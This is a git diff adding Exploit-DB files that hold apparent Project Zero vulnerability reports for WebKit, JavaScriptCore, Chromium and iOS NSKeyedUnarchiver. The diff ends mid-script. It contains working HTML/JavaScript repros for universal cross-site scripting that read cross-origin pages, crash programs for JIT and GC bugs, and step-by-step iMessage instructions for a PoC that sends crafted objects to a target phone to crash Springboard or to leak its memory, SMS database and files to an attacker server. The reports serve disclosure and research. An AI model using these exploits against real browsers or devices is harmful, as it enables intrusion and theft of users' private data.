+    parent_frame.appendChild(frame2);
+
+    a = frame2.contentDocument.createElement("a");
+    a.href = cache_frame.src;
+    a.click();
+    
+    showModalDialog(URL.createObjectURL(new Blob([`
+      <script>
+        let intervalID = setInterval(() => {
+          try {
+            opener.frame.document.foo;
+          } catch (e) {
+            clearInterval(intervalID);
+
+            window.close();
+          }
+        }, 100);
+      </scr` + "ipt>"], {type: "text/html"})));
+    frame2.src = "javascript:alert(document.documentElement.outerHTML)";
+  }
+}
+
+onclick = _ => {
+  frame = document.body.appendChild(document.createElement("iframe"));
+  frame.contentWindow.location = `javascript:'<b><p><iframe`
+      + ` src="javascript:top.run()"></iframe></b></p>'`;
+}
+
+cache_frame = document.body.appendChild(document.createElement("iframe"));
+cache_frame.src = "http://example.com/"; // victim page URL
+cache_frame.style.display = "none";
+</script>
+</body>
+
+
+From WebKit's bugtracker:
+
+Unfortunately, even though the patch from https://trac.webkit.org/changeset/244892/webkit
+has blocked the original repro case because it relies on executing javascript: URIs synchronously,
+the underlying issue is still not fixed.
+
+Currently, `requestFrame` is implemented as follows:
+bool SubframeLoader::requestFrame(HTMLFrameOwnerElement& ownerElement, const String& urlString, const AtomicString& frameName, LockHistory lockHistory, LockBackForwardList lockBackForwardList)
+{
+[...]
+    Frame* frame = loadOrRedirectSubframe(ownerElement, url, frameName, lockHistory, lockBackForwardList); // ***1***
+    if (!frame)
+        return false;
+
+    if (!scriptURL.isEmpty() && ownerElement.isURLAllowed(scriptURL)) {
+        // FIXME: Some sites rely on the javascript:'' loading synchronously, which is why we have this special case.
+        // Blink has the same workaround (https://bugs.chromium.org/p/chromium/issues/detail?id=923585).
+        if (urlString == "javascript:''" || urlString == "javascript:\"\"")
+            frame->script().executeIfJavaScriptURL(scriptURL);
+        else
+            frame->navigationScheduler().scheduleLocationChange(ownerElement.document(), ownerElement.document().securityOrigin(), scriptURL, m_frame.loader().outgoingReferrer(), lockHistory, lockBackForwardList, stopDelayingLoadEvent.release()); // ***2***
+    }
+
+    return true;
+}
+
+By the time the subframe loader schedules a JS URI load in [2], the frame might already contain a
+cross-origin victim page loaded in [1], so the JS URI might get executed in the cross-origin
+context.
+
+Updated repro:
+<body>
+<h1>Click anywhere</h1>
+<script>
+let counter = 0;
+function run(event) {
+  ++counter;
+  if (counter == 2) {
+    event.target.src = "javascript:alert(document.documentElement.outerHTML)";
+  } else if (counter == 3) {
+    frame = event.target;
+
+    a = frame.contentDocument.createElement("a");
+    a.href = cache_frame.src;
+    a.click();
+
+    showModalDialog(URL.createObjectURL(new Blob([`
+      <script>
+        let intervalID = setInterval(() => {
+          try {
+            opener.frame.document.foo;
+          } catch (e) {
+            clearInterval(intervalID);
+
+            window.close();
+          }
+        }, 100);
+      </scr` + "ipt>"], {type: "text/html"})));
+  }
+}
+
+onclick = _ => {
+  frame = document.body.appendChild(document.createElement("iframe"));
+  frame.contentWindow.location = `javascript:'<b><p><iframe`
+      + ` onload="top.run(event)"></iframe></b></p>'`;
+}
+
+cache_frame = document.body.appendChild(document.createElement("iframe"));
+cache_frame.src = "http://example.com/"; // victim page URL
+cache_frame.style.display = "none";
+</script>
+</body>
+
+I'd recommend you consider applying a fix similar to the one that the Blink team has in
+https://cs.chromium.org/chromium/src/third_party/blink/renderer/core/html/html_frame_element_base.cc?rcl=d3f22423d512b45466f1694020e20da9e0c6ee6a&l=62,
+i.e. using the frame's owner document as a fallback for the security check.
\ No newline at end of file
diff --git a/exploits/multiple/dos/47189.txt b/exploits/multiple/dos/47189.txt
new file mode 100644
index 000000000..a04669836
--- /dev/null
+++ b/exploits/multiple/dos/47189.txt
@@ -0,0 +1,22 @@
+When deserializing NSObjects with the NSArchiver API [1], one can supply a whitelist of classes that are allowed to be unarchived. In that case, any object in the archive whose class is not whitelisted will not be deserialized. Doing so will also cause the NSKeyedUnarchiver to "requireSecureCoding", ensuring that the archived classes conform to the NSSecureCoding protocol before deserializing them. With that, deserialization of untrusted archives is expected to now be possible in a secure manner. However, a child class of a class in the whitelist will also be deserialized by NSKeyedUnarchiver if one of the following is true (see -[NSCoder _validateAllowedClass:forKey:allowingInvocations:] in Foundation.framework for the exact logic):
+
+    * It implements initWithCoder: and supportsSecureCoding, and calling the supportsSecureCoding method returns true
+    * It doesn't implement initWithCoder and the first superclass that implements initWithCoder: also implements supportsSecureCoding which returns true
+
+In the latter case, deserializing such an object will invoke initWithCoder: of the superclass, which may then end up invoking methods of the child class. One such example is OITSUIntDictionary from the OfficeImport framework. This class inherits from NSDictionary, whose initWithCoder: will be called during unarchiving. Then the following happens:
+
+    * initWithCoder invokes initWithCapacity: with the number of key-value pairs in the archive. This ends up calling -[OITSUIntDictionary initWithCapacity:] which sets the backing storage for the dict to the result of `CFDictionaryCreateMutable(0LL, v3, 0LL, 0LL)`. Note that neither key- nor value callbacks are provided (arguments #3 and #4). As such, elements stored in the dictionary will not be retained. Presumably, this is because the dictionary is only supposed to store integers which are not reference counted
+    * Next, initWithCoder invokes setObject:forKey for each key-value pair of the archive. This will now store the keys and values in the OITSUIntDictionary *without* retaining them, thus their refcount will still be 1 and they are only kept alive by the NSKeyedUnarchiver instance
+    * Unarchiving finishes, the NSKeyedUnarchiver is destroyed and it releases all its references to the deserialized objects. These objects are then freed and the deserialized OITSUIntDictionary now contains stale pointers.
+
+Accessing the elements of the deserialized dictionary then leads to use-after-free issues.
+
+The OfficeImport library appears to be loaded by the QuickLook.framework on demand (in _getOfficeImportLibrary()), and QuickLook is loaded into the Springboard process. As such, there might be scenarios in which OfficeImport is loaded in Springboard, making this bug remotely triggerable via iMessage without any user interaction. In any case, any process that has the OfficeImport library loaded and deserializes untrusted NSDictionaries is vulnerable even if secureCoding is enforced during unarchiving.
+
+These type of bugs can be found somewhat automatically: the attached IDAPython script, when run in IDA Pro with the iOS dyld_shared_cache loaded, will enumerate all system libraries and determine classes that inherit from one of the whitelisted classes. It then writes a list of all candidates (classes that are allowed to be deserialized by NSKeyedUnarchiver with the whitelists present in iMessage parsing) to disk. Afterwards, these classes can be unarchived by first archiving a valid parent class (e.g. NSDictionary) and replacing the name of the parent class with the name of the child class in the serialized archive, then deserializing the archive again and invoking a few common methods on the resulting object, e.g. "count" or "objectForKey:". With that, the program will potentially crash when deserializing buggy child classes (as is the case for PFArray and OITSUIntDictionary).
+The attached archiveDict.m program can generate a valid NSDictionary archive, which can then be converted to xml format for easier editing with `plutil -convert xml1 archive`. unarchiveDict.m can afterwards deserialize the archive again into an NSDictionary instance.
+This approach, however, requires that all libraries loaded in the target process are also loaded in unarchiveDict, or else some of the classes won't be found and can thus not be deserialized.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47189.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/47190.txt b/exploits/multiple/dos/47190.txt
new file mode 100644
index 000000000..ef9557086
--- /dev/null
+++ b/exploits/multiple/dos/47190.txt
@@ -0,0 +1,82 @@
+While fuzzing JavaScriptCore, I encountered the following (modified and commented) JavaScript program which crashes jsc from current HEAD and release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc):
+
+    function v2(trigger) {
+        // Force JIT compilation.
+        for (let v7 = 0; v7 < 1000000; v7++) { }
+
+        if (!trigger) {
+            // Will synthesize .length, .callee, and Symbol.iterator.
+            // See ScopedArguments::overrideThings [1]
+            arguments.length = 1;
+        }
+
+        for (let v11 = 0; v11 < 10; v11++) {
+            // The for-of loop (really the inlined array iterator) will fetch the
+            // .length property after a StructureCheck. However, the property fetch
+            // will be hoisted in front of the outer loop by LICM but the
+            // StructureCheck won't. Then, in the final invocation it will crash
+            // because .length hasn't been synthezised yet (and thus the butterfly
+            // is nullptr).
+            for (const v14 of arguments) {
+                const v18 = {a:1337};
+                // The with statement here probably prevents escape analysis /
+                // object allocation elimination from moving v18 into the stack,
+                // thus forcing DFG to actually allocate v18. Then, LICM sees a
+                // write to structure IDs (from the object allocation) and thus
+                // cannot hoist the structure check (reading a structure ID) in
+                // front of the loop.
+                with (v18) { }
+            }
+        }
+    }
+
+    for (let v23 = 0; v23 < 100; v23++) {
+        v2(false);
+    }
+
+    print("Triggering crash");
+    v2(true);
+
+
+Here is what appears to be happening:
+
+When v2 is optimized by the FTL JIT, it will inline the ArrayIterator.next function for the for-of loop and thus produce the following DFG IR (of which many details were omitted for readability):
+
+    Block #8 (Before outer loop)
+        ...
+
+    Block #10 (bc#180): 		(Outer loop)
+        104:<!0:-> CheckStructure(Check:Cell:@97, MustGen, [%Cp:Arguments], R:JSCell_structureID, Exits, bc#201, ExitValid)
+        105:< 2:-> GetButterfly(Cell:@97, Storage|UseAsOther, Other, R:JSObject_butterfly, Exits, bc#201, ExitValid)
+
+    Block #12 (bc#464 --> next#<no-hash>:<0x10a8a08c0> bc#43 --> arrayIteratorValueNext#<no-hash>:<0x10a8a0a00> bc#29):  (Inner loop header)
+        378:< 4:-> GetByOffset(Check:Untyped:@105, KnownCell:@97, JS|PureInt|UseAsInt, BoolInt32, id2{length}, 100, R:NamedProperties(2), Exits, bc#34, ExitValid)  predicting BoolInt32
+
+    Block #17 (bc#487): 		(Inner loop body)
+        267:< 8:-> NewObject(JS|UseAsOther, Final, %B8:Object, R:HeapObjectCount, W:HeapObjectCount, Exits, bc#274, ExitValid)
+        273:<!0:-> PutByOffset(KnownCell:@267, KnownCell:@267, Check:Untyped:@270, MustGen, id7{a}, 0, W:NamedProperties(7), ClobbersExit, bc#278, ExitValid)
+        274:<!0:-> PutStructure(KnownCell:@267, MustGen, %B8:Object -> %EQ:Object, ID:45419, R:JSObject_butterfly, W:JSCell_indexingType,JSCell_structureID,JSCell_typeInfoFlags,JSCell_typeInfoType, ClobbersExit, bc#278, ExitInvalid)
+
+Eventually, the loop-invariant code motion optimization runs [2], changing graph to the following:
+
+    Block #8 (Before outer loop)
+        ...
+        105:< 2:-> GetButterfly(Cell:@97, Storage|UseAsOther, Other, R:JSObject_butterfly, Exits, bc#201, ExitValid)
+        378:< 4:-> GetByOffset(Check:Untyped:@105, KnownCell:@97, JS|PureInt|UseAsInt, BoolInt32, id2{length}, 100, R:NamedProperties(2), Exits, bc#34, ExitValid)  predicting BoolInt32
+
+    Block #10 (bc#180): 		(Outer loop)
+        104:<!0:-> CheckStructure(Check:Cell:@97, MustGen, [%Cp:Arguments], R:JSCell_structureID, Exits, bc#201, ExitValid)
+
+    Block #12 (bc#464 --> next#<no-hash>:<0x10a8a08c0> bc#43 --> arrayIteratorValueNext#<no-hash>:<0x10a8a0a00> bc#29):  (Inner loop header)
+
+    Block #17 (bc#487): 		(Inner loop body)
+        267:< 8:-> NewObject(JS|UseAsOther, Final, %B8:Object, R:HeapObjectCount, W:HeapObjectCount, Exits, bc#274, ExitValid)
+        273:<!0:-> PutByOffset(KnownCell:@267, KnownCell:@267, Check:Untyped:@270, MustGen, id7{a}, 0, W:NamedProperties(7), ClobbersExit, bc#278, ExitValid)
+        274:<!0:-> PutStructure(KnownCell:@267, MustGen, %B8:Object -> %EQ:Object, ID:45419, R:JSObject_butterfly, W:JSCell_indexingType,JSCell_structureID,JSCell_typeInfoFlags,JSCell_typeInfoType, ClobbersExit, bc#278, ExitInvalid)
+
+
+Here, the GetButterfly and GetByOffset operations, responsible for loading the .length property, were moved in front of the StructureCheck which is supposed to ensure that .length can be loaded in this way. This is clearly unsafe and will lead to a crash in the final invocation of the function when .length is not "synthesized" and thus the butterfly is nullptr.
+
+To understand why this happens it is necessary to look at the requirements for hoisting operations [3]. One of them is that "The node doesn't read anything that the loop writes.". In this case the CheckStructure operation reads the structure ID from the object ("R:JSCell_structureID" in the IR above) and the PutStructure writes a structure ID ("W:JSCell_indexingType,JSCell_structureID,JSCell_typeInfoFlags,JSCell_typeInfoType") as such the check cannot be hoisted because DFG cannot prove that the read value doesn't change in the loop body (note that here the compiler acts conservatively as it could, in this specific instance, determine that the structure ID being written to inside the loop is definitely not the one being read. It doesn't do so and instead only tracks abstract "heap locations" like the JSCell_structureID). However, as no operation in the loop bodies writes to either the JSObject_butterfly or the NamedProperties heap location (i.e. no Butterfly pointer or NamedProperty slot is ever written to inside the loop body), LICM incorrectly determined that the GetButterfly and GetByOffset operations could safely be hoisted in front of the loop body. See also https://bugs.chromium.org/p/project-zero/issues/detail?id=1775 and https://bugs.chromium.org/p/project-zero/issues/detail?id=1789 for more information about the LICM optimization.
+
+I suspect that this issue is more general (not limited to just `argument` objects) and allows bypassing of various StructureChecks in the JIT, thus likely being exploitable in many ways. However, I haven't confirmed that.
\ No newline at end of file
diff --git a/exploits/multiple/dos/47191.txt b/exploits/multiple/dos/47191.txt
new file mode 100644
index 000000000..666390fde
--- /dev/null
+++ b/exploits/multiple/dos/47191.txt
@@ -0,0 +1,98 @@
+While fuzzing JSC, I encountered the following JS program which crashes JSC from current HEAD and release (/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc):
+
+	// Run with  --useConcurrentJIT=false --thresholdForJITAfterWarmUp=10
+
+	function fullGC() {
+		for (var i = 0; i < 10; i++) {
+			new Float64Array(0x1000000);
+		}
+	}
+
+	function v62() {
+		function v141() {
+			try {
+				const v146 = v141();
+			} catch(v147) {
+				const v154 = Object();
+				function v155(v156,v157,v158) {
+					try {
+						// This typed array gets collected
+						// but is still referenced from the
+						// value profile of TypedArray.values
+						const v167 = new Uint32Array();
+						const v171 = v167.values();
+					} catch(v177) {
+					}
+				}
+				const v181 = v155();
+			}
+		}
+
+		v141();
+
+		function edenGC() {
+			for (let v194 = 0; v194 < 100; v194++) {
+				const v204 = new Float64Array(0x10000);
+			}
+		}
+		const v205 = edenGC();
+	}
+
+	for (let i = 0; i < 6; i++) {
+		const v209 = v62();
+	}
+
+	fullGC();
+
+If the loop that calls v62 is run 100 instead of 6 times it will also crash without --thresholdForJITAfterWarmUp=10, albeit a bit less reliable.
+
+Running this sample will crash JSC in debug builds with an assertion like this:
+
+	ASSERTION FAILED: structureIndex < m_capacity
+	Source/JavaScriptCore/runtime/StructureIDTable.h(175) : JSC::Structure *JSC::StructureIDTable::get(JSC::StructureID)
+	1   0x101aadcf9 WTFCrash
+	2   0x101aadd19 WTFCrashWithSecurityImplication
+	3   0x10000cb18 JSC::StructureIDTable::get(unsigned int)
+	4   0x10000ca23 JSC::VM::getStructure(unsigned int)
+	5   0x10000c7cf JSC::JSCell::structure(JSC::VM&) const
+	6   0x10001887b JSC::JSCell::structure() const
+	7   0x10072fc05 JSC::speculationFromCell(JSC::JSCell*)
+	8   0x10072fd9f JSC::speculationFromValue(JSC::JSValue)
+	9   0x1006963dc JSC::ValueProfileBase<1u>::computeUpdatedPrediction(JSC::ConcurrentJSLocker const&)
+    ...
+
+The crash is due to a JSValue pointing to a previously freed chunk which will have its JSCell header overwritten. As such, it then crashes when accessing the structure table out-of-bounds with the clobbered structure ID.
+
+The JSValue that is being accessed is part of a ValueProfile: a data structure attached to bytecode operations which keeps track of input types that have been observed for its operation. During execution in the interpreter or baseline JIT, input types for operations will be stored in their associated ValueProfile as can e.g. be seen in the implementation of the low-level interpreter (LLInt) [1]. This is a fundamental mechanism of current JS engines allowing optimizing JIT compilers (like the DFG and FTL) to speculate about types of variables in the compiled program by inspecting previously observed types collected in these ValueProfiles.
+
+A ValueProfile is implemented by the ValueProfileBase C++ struct:
+
+    struct ValueProfileBase {
+
+        ...
+        int m_bytecodeOffset; // -1 for prologue
+        unsigned m_numberOfSamplesInPrediction { 0 };
+
+        SpeculatedType m_prediction { SpecNone };
+
+        EncodedJSValue m_buckets[totalNumberOfBuckets];
+    };
+
+Here, m_buckets will store the raw JSValues that have been observed during execution. m_prediction in turn will contain the current type prediction [2] for the associated value, which is what the JIT compilers ultimately rely on. The type prediction is regularly computed from the observed values in computeUpdatedPrediction [3].
+
+This raises the question how the JSValues in m_buckets are kept alive during GC, as they are not stored in a MarkedArgumentBuffer [4] or similar (which automatically inform the GC of the objects and thus keep them alive). The answer is that they are in fact not kept alive during GC by the ValueProfiles themselves. Instead, computeUpdatedPrediction [3] is invoked from finalizeUnconditionally [5] at the end of the GC marking phase and will clear the m_buckets array before the pointers might become dangling. Basically, it works like this:
+
+* Observed JSValues are simply stored into ValueProfiles at runtime by the interpreter or baseline JIT without informing the GC about these references
+* Eventually, GC kicks in and starts its marking phase in which it visits all reachable objects and marks them as alive
+* Afterwards, before sweeping, the GC invokes various callbacks (called "unconditionalFinalizers") [6] on certain objects (e.g. CodeBlocks)
+* The CodeBlock finalizers update all value profiles, which in turn causes their current speculated type to be merged with the runtime values that were observed since the last update
+* Afterwards, all entries in the m_buckets array of the ValueProfiles are cleared to zero [7]. As such, the ValueProfiles no longer store any pointers to JSObjects
+* Finally, the sweeping phase runs and frees all JSCells that have not been marked
+
+
+For some time now, JSC has used lightweight GC cycles called "eden" collections. These will keep mark bits from previous eden collections and thus only scan newly allocated objects, not the entire object graph. As such they are quicker than a "full" GC, but might potentially leave unused ("garbage") objects alive which will only be collected during the next full collection. See also [8] for an in depth explanation of JSC's current garbage collector.
+
+As described above, the function finalizeMarkedUnconditionalFinalizers [6] is responsible for invoking some callback on objects that have been marked (and thus are alive) after the marking phase. However, during eden collections this function only iterates over JSCells that have been marked in the *current* eden collection, not any of the previous ones *. As such, it is possible that a CodeBlock has been marked in a previous eden collection (and is thus still alive), but hasn't been marked in the current one and will thus not be "unconditionally finalized". In that case, its ValueProfile will not be cleared and will still potentially contain pointers to various JSObjects, which, however, aren't protected from GC and thus might be freed by it.
+This is what happens in the program above: the TypedArray.values function is a JS builtin [9] and will thus be JIT compiled. At the time of the crash it will be baseline JIT compiled and thus store the newly allocated Uint32Array into one of its ValueProfile [10]. Directly afterwards, the compiled code raises another stack overflow exception [11]. As such, the Uint32Array is not used any further and no more references to it are taken which could protect it from GC. As such, the array will be collected during the next (eden) GC round. However, the CodeBlock for TypedArray.values was already marked in a previous eden collection and will not be finalized, thus leaving the pointer to the freed TypedArray dangling in the ValueProfile. During the next full GC, the CodeBlock is again "unconditionally finalized" and will then inspects its m_buckets, thus crashing when using the freed JSValue.
+
+The infinite recursion and following stack overflow exceptions in this sample might be necessary to force a situation in which the newly allocated Uint32Array is only stored into a profiling slot and nowhere else. But maybe they are also simply required to cause the right sequence of GC invocations.
\ No newline at end of file
diff --git a/exploits/multiple/dos/47192.txt b/exploits/multiple/dos/47192.txt
new file mode 100644
index 000000000..357d495c0
--- /dev/null
+++ b/exploits/multiple/dos/47192.txt
@@ -0,0 +1,18 @@
+When deserializing a class with initWithCoder, subclasses of that class can also be deserialized so long as they do not override initWithCoder and implement all methods that require a concrete implementation.
+
+_PFArray is such a subclass of NSArray. When a _PFArray is deserialized, it is deserialized with [NSArray initWithCoder:], which eventually calls [_PFArray initWithObjects:count:]. This method initializes the array with the objects provided by the NSKeyedUnarchiver, but does not retain references to these objects, so when the NSKeyedUnarchiver is released, the objects in the array will also be released, even though the user of the deserialized objects could still be using them.
+
+This issue can be reached remotely via iMessage and crash Springboard with no user interaction.
+
+To reproduce the issue with the files in pfarray.zip:
+
+1) install frida (pip3 install frida)
+2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
+3) in injectMessage.js replace the marker "PATH" with the path of the obj file
+4) in the local directory, run:
+
+python3 sendMessage.py
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47192.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/47193.txt b/exploits/multiple/dos/47193.txt
new file mode 100644
index 000000000..fca6da56d
--- /dev/null
+++ b/exploits/multiple/dos/47193.txt
@@ -0,0 +1,18 @@
+There is a memory corruption vulnerability when decoding an object of class  NSKnownKeysDictionary1. This class decodes an object of type NSKnownKeysMappingStrategy1, which decodes a length member which is supposed to represent the length of the keys of the dictionary. However, this member is decoded before the keys are decoded, so if a key is an instance of NSKnownKeysDictionary1 which also uses this instance of NSKnownKeysMappingStrategy1, the mapping strategy will be used before the length is checked. The NSKnownKeysDictionary1 instance uses this length to allocate a buffer, and the length is multiplied by 8 during this allocation without an integer overflow check. The code will then attempt to copy the values array (another decoded parameter) into the buffer using the unmultiplied length.
+
+It is not possible to control the copied values in this bug, because getObjects:range would then be called with a very large range and throw an exception. However, if the decoded values array is null, getObjects:range will do nothing, and then the code will go through a loop where it copies and retains entries from the values array into the buffer allocated based on the length member, going well past the end of both allocations.
+
+This issue would likely be fairly difficult to exploit due to the uncontrolled nature of these copies.
+
+To reproduce this issue in iMessage with knownkeydict:
+
+1) install frida (pip3 install frida)
+2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
+3) in injectMessage.js replace the marker "PATH" with the path of the obj file
+4) in the local directory, run:
+
+python3 sendMessage.py
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47193.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/47194.txt b/exploits/multiple/dos/47194.txt
new file mode 100644
index 000000000..2a746c96f
--- /dev/null
+++ b/exploits/multiple/dos/47194.txt
@@ -0,0 +1,39 @@
+The class _NSDataFileBackedFuture can be deserialized even if secure encoding is enabled. This class is a file-backed NSData object that loads a local file into memory when the [NSData bytes] selector is called. This presents two problems. First, it could potentially allow undesired access to local files if the code deserializing the buffer ever shares it (this is more likely to cause problems in components that use serialized objects to communicate locally than in iMessage). Second, it allows an NSData object to be created with a length that is different than the length of its byte array. This violates a very basic property that should always be true of NSData objects. This can allow out of bounds reads, and could also potentially lead to out-of-bounds writes, as it is now possible to create NSData objects with very large sizes that would not be possible if the buffer was backed.
+
+To reproduce the issue with the files in filebacked.zip:
+
+1) install frida (pip3 install frida)
+2) open sendMessage.py, and replace the sample receiver with the phone number or email of the target device
+3) in injectMessage.js replace the marker "PATH" with the path of the obj file
+4) in the local directory, run:
+
+python3 sendMessage.py
+
+Please note that the attached repro case is a simple example to demonstrate the reach-ability of the class in Springboard. The actual consequences of the bug are likely more serious. This PoC only works on devices with iOS 12 or later. 
+
+
+I've written up a PoC of this issue leaking memory from a remote device. To use the PoC, replace all instances of "natashenka.party" in the attached files with the domain of the server you are using to reproduce the issue. Then run myserver.py on the server, and use the files in filebackedleak.zip to send a message to a target device, using the instructions in the issue above. Leaked bytes of memory from Springboard in the target device will be displayed in the output of myserver.py.
+
+A quick summary of how this PoC works:
+
+1) iMessage attempts to decode the object in the file obj to display the message notification
+2) A _NSDataFileBackedFuture instance is decoded, with a fileURL of http://natashenka.party//System/Library/ColorSync/Resources/ColorTables.data and a long length.
+3) An ACZeroingString instance is decoded, using the previous _NSDataFileBackedFuture as its bytes. When the bytes are accessed, they will be fetched from the above URL. The _NSDataFileBackedFuture class attempts to prevent remote URLs from being fetched by checking that the path of the URL exists on the system, but it does not check the scheme, so a remote URL can be fetched so long as its path component is a path that exists on the filesystem
+4) The remote server responds with a buffer that contains the URL http://natashenka.party//System/Library/ColorSync/Resources/ColorTables.data?val=a. Since the length of the _NSDataFileBackedFuture is long, this will lead to a buffer that contains the URL as well as some unallocated, uninitialized memory
+5) Unfortunately, it is not possible to leak the memory by accessing the URL with the leaked memory created in step 4 using another _NSDataFileBackedFuture at this stage, because the NSURL class greatly restricts the characters allowed in a URL, so it is necessary to bypass these checks. It is possible to do this with the INDeferredLocalizedString class, which is a string that can have different values based on localization
+6) An INDeferredLocalizedString instance is decoded with one property being a string that is a legal URL, and the other being the string with the invalid characters. There is a cycle in initialization that causes an NSURL instance to be initialized using the valid string, but then the string moves into a state where it will return the invalid characters when the NSURL is used.
+7) A _NSDataFileBackedFuture is used to access the URL, and the leaked bytes are send to the server as the URL parameter
+
+
+I've got this issue to read files from a remote device. To use the PoC, replace all instances of "natashenka.party" in the attached files with the domain of the server you are using to reproduce the issue. Then run myserver.py on the server,  and use the files in messageleak.zip to send a message to a target device, using the instructions in the issue above. There are two possible objects to send the device:
+
+obj_db: sends back the file in an escaped format that omits nulls. Good for leaking the SMS database
+obj_image: sends back the file in a url encoded format. Good for leaking binary files like images
+
+The file contents will be output on the commandline of myserver.py. There are some length limits in the server file that can be removed to see more data. The server will also output a file named 'buf'. Processing this file with uni.py (requires python3) will output the file. This only works with the the obj_image object.
+
+This PoC works similarly to the one above, but it encodes the string by using the formatting options in INDeferredLocalizedString.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47194.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/47211.html b/exploits/multiple/dos/47211.html
new file mode 100644
index 000000000..7f40422fb
--- /dev/null
+++ b/exploits/multiple/dos/47211.html
@@ -0,0 +1,47 @@
+<!--
+VULNERABILITY DETAILS
+void PresentationAvailabilityState::UpdateAvailability(
+    const KURL& url,
+    mojom::blink::ScreenAvailability availability) {
+[...]
+  {
+    // Set |iterating_listeners_| so we know not to allow modifications
+    // to |availability_listeners_|.
+    base::AutoReset<bool> iterating(&iterating_listeners_, true);
+    for (auto& listener_ref : availability_listeners_) {
+      auto* listener = listener_ref.get();
+      if (!listener->urls.Contains<KURL>(url))
+        continue;
+
+      auto screen_availability = GetScreenAvailability(listener->urls);
+      DCHECK(screen_availability != mojom::blink::ScreenAvailability::UNKNOWN);
+      for (auto* observer : listener->availability_observers)
+        observer->AvailabilityChanged(screen_availability); // ***1***
+[...]
+
+`PresentationAvailabilityObserver::AvailabilityChanged` might call a user-defined JS event handler,
+which in turn might modify `availability_observers` and invalidate the `for` loop's iterator.
+
+VERSION
+Chromium 74.0.3729.0 (Developer Build) (64-bit)
+Chromium 76.0.3789.0 (Developer Build) (64-bit)
+
+REPRODUCTION CASE
+Note that you need an extra display connected to your machine to reproduce the bug, otherwise
+`UpdateAvailability` won't be called.
+-->
+
+<body>
+<script>
+frame = document.body.appendChild(document.createElement("iframe"));
+request = new frame.contentWindow.PresentationRequest([location]);
+request.getAvailability().then(availability => {
+  availability.onchange = () => frame.remove();
+});
+</script>
+</body>
+
+<!--
+CREDIT INFORMATION
+Sergei Glazunov of Google Project Zero.
+-->
\ No newline at end of file
diff --git a/exploits/multiple/dos/47237.txt b/exploits/multiple/dos/47237.txt
new file mode 100644
index 000000000..6698762b5
--- /dev/null
+++ b/exploits/multiple/dos/47237.txt
@@ -0,0 +1,138 @@
+VULNERABILITY DETAILS
+https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/xml/XSLTProcessor.cpp#L66
+```
+Ref<Document> XSLTProcessor::createDocumentFromSource(const String& sourceString,
+    const String& sourceEncoding, const String& sourceMIMEType, Node* sourceNode, Frame* frame)
+{
+    Ref<Document> ownerDocument(sourceNode->document());
+    bool sourceIsDocument = (sourceNode == &ownerDocument.get());
+    String documentSource = sourceString;
+
+    RefPtr<Document> result;
+    if (sourceMIMEType == "text/plain") {
+        result = XMLDocument::createXHTML(frame, sourceIsDocument ? ownerDocument->url() : URL());
+        transformTextStringToXHTMLDocumentString(documentSource);
+    } else
+        result = DOMImplementation::createDocument(sourceMIMEType, frame, sourceIsDocument ? ownerDocument->url() : URL());
+
+    // Before parsing, we need to save & detach the old document and get the new document
+    // in place. We have to do this only if we're rendering the result document.
+    if (frame) {
+[...]
+        frame->setDocument(result.copyRef());
+    }
+
+    auto decoder = TextResourceDecoder::create(sourceMIMEType);
+    decoder->setEncoding(sourceEncoding.isEmpty() ? UTF8Encoding() : TextEncoding(sourceEncoding), TextResourceDecoder::EncodingFromXMLHeader);
+    result->setDecoder(WTFMove(decoder));
+
+    result->setContent(documentSource);
+```
+
+https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/page/Frame.cpp#L248
+```
+void Frame::setDocument(RefPtr<Document>&& newDocument)
+{
+    ASSERT(!newDocument || newDocument->frame() == this);
+
+    if (m_documentIsBeingReplaced) // ***1***
+        return;
+
+    m_documentIsBeingReplaced = true;
+
+[...]
+
+    if (m_doc && m_doc->pageCacheState() != Document::InPageCache)
+        m_doc->prepareForDestruction(); // ***2***
+
+    m_doc = newDocument.copyRef();
+```
+
+`setDocument` calls `Document::prepareForDestruction`, which might trigger JavaScript execution via
+a nested frame's "unload" event handler. Therefore the `m_documentIsBeingReplaced` flag has been
+introduced to avoid reentrant calls. The problem is that by the time `setDocument` is called,
+`newDocument` might already have a reference to a `Frame` object, and if the method returns early,
+that reference will never get cleared by subsequent navigations. It's not possible to trigger
+document replacement inside `setDocument` via a regular navigation request or a 'javascript:' URI
+load; however, an attacker can use an XSLT transformation for that.
+
+When the attacker has an extra document attached to a frame, they can navigate the frame to a
+cross-origin page and issue a form submission request to a 'javascript:' URI using the extra
+document to trigger UXSS.
+
+VERSION
+WebKit revision 245321.
+It should affect the stable branch as well, but the test case crashes Safari 12.1.1 (14607.2.6.1.1).
+
+REPRODUCION CASE
+repro.html:
+```
+<body>
+<script>
+createFrame = doc => doc.body.appendChild(document.createElement('iframe'));
+
+pi = document.createProcessingInstruction('xml-stylesheet',
+  'type="text/xml" href="stylesheet.xml"');
+cache_frame = createFrame(document);
+cache_frame.contentDocument.appendChild(pi);
+
+setTimeout(() => {
+  victim_frame = createFrame(document);
+  child_frame_1 = createFrame(victim_frame.contentDocument);
+  child_frame_1.contentWindow.onunload = () => {
+    victim_frame.src = 'javascript:""';
+    try {
+      victim_frame.contentDocument.appendChild(document.createElement('html')).
+        appendChild(document.createElement('body'));
+    } catch { }
+    
+    child_frame_2 = createFrame(victim_frame.contentDocument);
+    child_frame_2.contentWindow.onunload = () => {
+      doc = victim_frame.contentDocument;
+      doc.write('foo');
+      doc.firstChild.remove();
+
+      doc.appendChild(pi);
+      doc.appendChild(doc.createElement('root'));
+
+      doc.close();
+    }
+  }
+
+  victim_frame.src = 'javascript:""';
+
+  if (child_frame_1.xslt_script_run) {
+    victim_frame.src = 'http://example.com/';
+    victim_frame.onload = () => {
+      form = corrupted_doc.createElement('form');
